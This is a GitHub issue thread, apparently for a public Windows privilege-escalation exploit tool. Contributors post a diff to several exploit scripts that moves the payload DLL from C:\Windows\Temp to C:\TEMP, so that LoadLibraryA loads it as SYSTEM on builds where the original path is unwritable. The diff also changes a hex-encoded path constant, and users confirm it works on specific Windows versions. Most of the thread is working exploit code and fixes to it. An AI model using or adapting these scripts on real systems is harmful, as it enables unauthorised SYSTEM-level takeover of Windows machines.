-
Notifications
You must be signed in to change notification settings - Fork 271
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
handle unwritable temp dir #2
Comments
I think I will just need to do
Then update the path accordingly, this thing in ctf-exploit-common-win10.ctf:
|
Even easier:
This seems to work, testing on a few VMs now: diff --git a/scripts/ctf-consent-system.ctf b/scripts/ctf-consent-system.ctf
index ded81b7..fcc7a6e 100644
--- a/scripts/ctf-consent-system.ctf
+++ b/scripts/ctf-consent-system.ctf
@@ -5,14 +5,14 @@
print Attempting to copy exploit payload...
-# This exploit runs LoadLibraryA(C:\WINDOWS\TEMP\EXPLOIT.DLL) as SYSTEM.
-run CMD /C COPY PAYLOAD64.DLL %SYSTEMROOT%\TEMP\EXPLOIT.DLL
+# This exploit runs LoadLibraryA(C:\TEMP\EXPLOIT.DLL) as SYSTEM.
+run XCOPY PAYLOAD64.DLL C:\TEMP\EXPLOIT.DLL*
# Print a warning if that didnt work.
repeat rc print
-repeat rc print !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
-repeat rc print !!! THIS EXPLOIT REQUIRES C:\WINDOWS\TEMP\EXPLOIT.DLL TO EXIST !!!
-repeat rc print !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+repeat rc print !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+repeat rc print !!! THIS EXPLOIT REQUIRES C:\TEMP\EXPLOIT.DLL TO EXIST !!!
+repeat rc print !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
repeat rc print
print
diff --git a/scripts/ctf-exploit-common-win10.ctf b/scripts/ctf-exploit-common-win10.ctf
index 98af118..e06af18 100644
--- a/scripts/ctf-exploit-common-win10.ctf
+++ b/scripts/ctf-exploit-common-win10.ctf
@@ -420,7 +420,7 @@ repeat r1 callstub 0 0 r3
print Writing in the payload path "C:\WINDOWS\TEMP\EXPLOIT.DLL"...
# And finally, lets load "../TEMP/EXPLOIT", which should be writable by all users.
-set r2 0x5c504d45545c2e2e
+set r2 0x5c504d45545c3a43
patch 0 0xa8 r0 8 -0x120
set r1 r2
diff --git a/scripts/ctf-logonui-system.ctf b/scripts/ctf-logonui-system.ctf
index 5d28dcc..b2dca0d 100644
--- a/scripts/ctf-logonui-system.ctf
+++ b/scripts/ctf-logonui-system.ctf
@@ -5,8 +5,8 @@
print Attempting to copy exploit payload...
-# This exploit runs LoadLibraryA(C:\WINDOWS\TEMP\EXPLOIT.DLL) as SYSTEM.
-run CMD /C COPY PAYLOAD64.DLL %SYSTEMROOT%\TEMP\EXPLOIT.DLL
+# This exploit runs LoadLibraryA(C:\TEMP\EXPLOIT.DLL) as SYSTEM.
+run XCOPY PAYLOAD64.DLL C:\TEMP\EXPLOIT.DLL*
# Print a warning if that didnt work.
repeat rc print |
Hmm OK, let's do it. Maybe I should use |
as a note, the build where I have experienced the issue was 18362.267 |
Yep, same issue in Windows 1607. I also fixed it by doing this #2 (comment) |
A comment on twitter says that on some systems
C:\Windows\Temp
is not writable, but he got the exploit working usingC:\Temp
instead.https://twitter.com/matteomalvica/status/1161378715663831040
I should probably handle this in my script.
The text was updated successfully, but these errors were encountered: